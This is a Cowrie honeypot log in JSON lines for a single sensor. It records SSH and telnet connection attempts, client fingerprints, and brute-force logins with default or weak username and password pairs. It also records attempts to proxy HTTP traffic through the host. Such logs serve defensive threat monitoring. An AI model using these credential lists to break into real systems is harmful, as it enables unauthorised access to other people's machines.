{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:09:23.852803Z","src_ip":"154.221.19.37","session":"2abd0d4959bc"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":19904,"dst_ip":"1.2.3.4","dst_port":22,"session":"5750e17c383b","protocol":"ssh","message":"New connection: 80.94.95.15:19904 (1.2.3.4:22) [session: 5750e17c383b]","sensor":"my-vps","timestamp":"2025-08-26T17:09:41.306611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T17:09:41.307726Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T17:09:41.373990Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris","message":"login attempt [paris/paris] failed","sensor":"my-vps","timestamp":"2025-08-26T17:09:41.718188Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris1","message":"login attempt [paris/paris1] failed","sensor":"my-vps","timestamp":"2025-08-26T17:09:42.787537Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris123","message":"login attempt [paris/paris123] failed","sensor":"my-vps","timestamp":"2025-08-26T17:09:43.855526Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris1234","message":"login attempt [paris/paris1234] failed","sensor":"my-vps","timestamp":"2025-08-26T17:09:44.924592Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris12345","message":"login attempt [paris/paris12345] failed","sensor":"my-vps","timestamp":"2025-08-26T17:09:45.993190Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:09:47.061535Z","src_ip":"80.94.95.15","session":"5750e17c383b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:09:47.393611Z","src_ip":"154.221.19.37","session":"56f39af3fa8b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:10:01.459382Z","src_ip":"154.221.19.37","session":"9a682182611a"}
{"eventid":"cowrie.session.connect","src_ip":"112.161.71.197","src_port":50641,"dst_ip":"1.2.3.4","dst_port":23,"session":"a72a7e067924","protocol":"telnet","message":"New connection: 112.161.71.197:50641 (1.2.3.4:23) [session: a72a7e067924]","sensor":"my-vps","timestamp":"2025-08-26T17:10:16.722375Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:10:39.003957Z","src_ip":"154.221.19.37","session":"f3b88276e4b7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49084,"dst_ip":"1.2.3.4","dst_port":22,"session":"254f52043157","protocol":"ssh","message":"New connection: 213.209.150.239:49084 (1.2.3.4:22) [session: 254f52043157]","sensor":"my-vps","timestamp":"2025-08-26T17:10:41.732615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:10:41.733396Z","src_ip":"213.209.150.239","session":"254f52043157"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T17:10:41.790162Z","src_ip":"213.209.150.239","session":"254f52043157"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:10:42.072329Z","src_ip":"213.209.150.239","session":"254f52043157"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":24841,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:24841","sensor":"my-vps","timestamp":"2025-08-26T17:10:42.129884Z","session":"254f52043157"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:10:42.186575Z","src_ip":"213.209.150.239","session":"254f52043157"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":29519,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:29519","sensor":"my-vps","timestamp":"2025-08-26T17:10:42.343277Z","session":"254f52043157"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T17:10:42.400988Z","src_ip":"213.209.150.239","session":"254f52043157"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:10:42.458476Z","src_ip":"213.209.150.239","session":"254f52043157"}
{"eventid":"cowrie.session.closed","duration":30.455618619918823,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:10:47.177924Z","src_ip":"112.161.71.197","session":"a72a7e067924"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":51104,"dst_ip":"1.2.3.4","dst_port":23,"session":"592ec0b4b4ba","protocol":"telnet","message":"New connection: 79.124.8.120:51104 (1.2.3.4:23) [session: 592ec0b4b4ba]","sensor":"my-vps","timestamp":"2025-08-26T17:11:01.530225Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:11:01.570370Z","src_ip":"79.124.8.120","session":"592ec0b4b4ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:11:01.630185Z","src_ip":"79.124.8.120","session":"592ec0b4b4ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7137,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e5960299bb","protocol":"ssh","message":"New connection: 212.227.125.160:7137 (1.2.3.4:22) [session: b9e5960299bb]","sensor":"my-vps","timestamp":"2025-08-26T17:11:16.077318Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:11:16.078642Z","src_ip":"212.227.125.160","session":"b9e5960299bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7376,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a35b07e746a","protocol":"ssh","message":"New connection: 212.227.125.160:7376 (1.2.3.4:22) [session: 4a35b07e746a]","sensor":"my-vps","timestamp":"2025-08-26T17:11:16.191042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:11:16.192268Z","src_ip":"212.227.125.160","session":"4a35b07e746a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T17:11:16.307654Z","src_ip":"212.227.125.160","session":"4a35b07e746a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:11:16.654038Z","src_ip":"212.227.125.160","session":"4a35b07e746a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T17:11:16.770479Z","session":"4a35b07e746a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50692,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cc5000f97c3","protocol":"ssh","message":"New connection: 217.72.205.35:50692 (1.2.3.4:22) [session: 6cc5000f97c3]","sensor":"my-vps","timestamp":"2025-08-26T17:11:21.232724Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:11:21.233805Z","src_ip":"217.72.205.35","session":"6cc5000f97c3"}
{"eventid":"cowrie.session.connect","src_ip":"152.110.28.175","src_port":49412,"dst_ip":"1.2.3.4","dst_port":23,"session":"dca4eddf00b8","protocol":"telnet","message":"New connection: 152.110.28.175:49412 (1.2.3.4:23) [session: dca4eddf00b8]","sensor":"my-vps","timestamp":"2025-08-26T17:11:56.326401Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":56854,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc8714802c23","protocol":"ssh","message":"New connection: 139.19.117.131:56854 (1.2.3.4:22) [session: dc8714802c23]","sensor":"my-vps","timestamp":"2025-08-26T17:12:13.656706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:12:13.657814Z","src_ip":"139.19.117.131","session":"dc8714802c23"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T17:12:13.674513Z","src_ip":"139.19.117.131","session":"dc8714802c23"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","sensor":"my-vps","timestamp":"2025-08-26T17:12:13.708809Z","src_ip":"139.19.117.131","session":"dc8714802c23"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T17:12:13.709402Z","src_ip":"139.19.117.131","session":"dc8714802c23"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","sensor":"my-vps","timestamp":"2025-08-26T17:12:13.726318Z","src_ip":"139.19.117.131","session":"dc8714802c23"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T17:12:13.727352Z","src_ip":"139.19.117.131","session":"dc8714802c23"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:12:23.656986Z","src_ip":"139.19.117.131","session":"dc8714802c23"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:12:26.191204Z","src_ip":"212.227.125.160","session":"4a35b07e746a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47690,"dst_ip":"1.2.3.4","dst_port":23,"session":"29cb75c7a472","protocol":"telnet","message":"New connection: 212.227.235.229:47690 (1.2.3.4:23) [session: 29cb75c7a472]","sensor":"my-vps","timestamp":"2025-08-26T17:12:46.270623Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:12:46.477453Z","src_ip":"212.227.235.229","session":"29cb75c7a472"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:12:46.538811Z","src_ip":"212.227.235.229","session":"29cb75c7a472"}
{"eventid":"cowrie.session.closed","duration":120.03591084480286,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:13:56.362120Z","src_ip":"152.110.28.175","session":"dca4eddf00b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:14:01.636832Z","src_ip":"79.124.8.120","session":"592ec0b4b4ba"}
{"eventid":"cowrie.session.closed","duration":180.11289286613464,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:14:01.643045Z","src_ip":"79.124.8.120","session":"592ec0b4b4ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.1","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:15:46.599937Z","src_ip":"212.227.235.229","session":"29cb75c7a472"}
{"eventid":"cowrie.session.closed","duration":180.33330011367798,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:15:46.603854Z","src_ip":"212.227.235.229","session":"29cb75c7a472"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":58770,"dst_ip":"1.2.3.4","dst_port":22,"session":"39d3e7d733a7","protocol":"ssh","message":"New connection: 45.88.8.186:58770 (1.2.3.4:22) [session: 39d3e7d733a7]","sensor":"my-vps","timestamp":"2025-08-26T17:15:56.765855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:15:57.491874Z","src_ip":"45.88.8.186","session":"39d3e7d733a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:15:57.493080Z","src_ip":"45.88.8.186","session":"39d3e7d733a7"}
{"eventid":"cowrie.login.success","username":"root","password":"06110611","message":"login attempt [root/06110611] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:15:59.713153Z","src_ip":"45.88.8.186","session":"39d3e7d733a7"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:16:01.169071Z","src_ip":"45.88.8.186","session":"39d3e7d733a7"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":43024,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b3cb698d34a","protocol":"ssh","message":"New connection: 45.88.8.215:43024 (1.2.3.4:22) [session: 2b3cb698d34a]","sensor":"my-vps","timestamp":"2025-08-26T17:16:38.668535Z"}
